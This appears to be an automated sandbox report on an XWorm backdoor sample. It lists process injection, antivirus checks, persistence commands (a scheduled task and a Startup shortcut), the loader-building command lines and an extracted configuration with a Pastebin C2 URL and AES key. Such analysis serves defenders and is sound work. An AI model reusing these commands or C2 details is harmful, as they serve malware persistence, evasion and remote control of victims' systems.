Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00472992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00472992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00460BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460D45 SetUnhandledExceptionFilter,	11_2_00460D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00460F91

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: D7D000			Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004A1B4D

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ABBED SendInput,keybd_event,

11_2_004ABBED

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004AEC6C mouse_event,

11_2_004AEC6C

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

11_2_004A14AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_004A1FB0

Source: Telecom.pif, 0000000B.00000003.1222451762.00000000044C9000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmp, EcoScape.pif, 00000013.00000002.1246780607.0000000000503000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Telecom.pif	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00460A08 cpuid

11_2_00460A08

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E5F4 GetLocalTime,

11_2_0049E5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E652 GetUserNameW,

11_2_0049E652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0047BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_0047BCD2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040350A

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: Telecom.pif	Binary or memory string: WIN_81
Source: Telecom.pif	Binary or memory string: WIN_XP
Source: Commander.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Telecom.pif	Binary or memory string: WIN_XPe
Source: Telecom.pif	Binary or memory string: WIN_VISTA
Source: Telecom.pif	Binary or memory string: WIN_7
Source: Telecom.pif	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_004C2263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		11_2_004C1C61

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/Dh8E7H3R	false		high

AV Detection

Found malware configuration

Source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/Dh8E7H3R", "Aes key": "<123456789>", "Install file": "USB.exe"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	ReversingLabs: Detection: 21%

Sample uses string decryption to hide its real strings

Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: https://pastebin.com/raw/Dh8E7H3R
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <123456789>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: <Xwormmm>
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: ASGARD
Source: 11.3.Telecom.pif.4552c30.3.raw.unpack	String decryptor: USB.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegAsm.pdbRegAsm.pdbpdbAsm.pdbicrosoft\Windows\INetCache\23855\RegAsm.pdb4 source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89 source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.PDBR$ source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\RegAsm.pdbh source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp, RegAsm.exe.11.dr
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbmV[ source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdb89\System.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdbpdbAsm.pdblT source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.pdbv* source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbwF= source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdbw source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\RegAsm.pdbV= source: RegAsm.exe, 00000022.00000002.2439285805.000000000106B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000021.00000000.1476146946.00000000001B2000.00000002.00000001.01000000.0000000B.sdmp, RegAsm.exe.11.dr
Source:	Binary string: symbols\exe\RegAsm.pdb source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\RegAsm.pdbnVR source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbs source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000022.00000002.2439285805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n,C:\Windows\RegAsm.pdbpdbAsm.pdbI source: RegAsm.exe, 00000022.00000002.2437621793.0000000000BF8000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
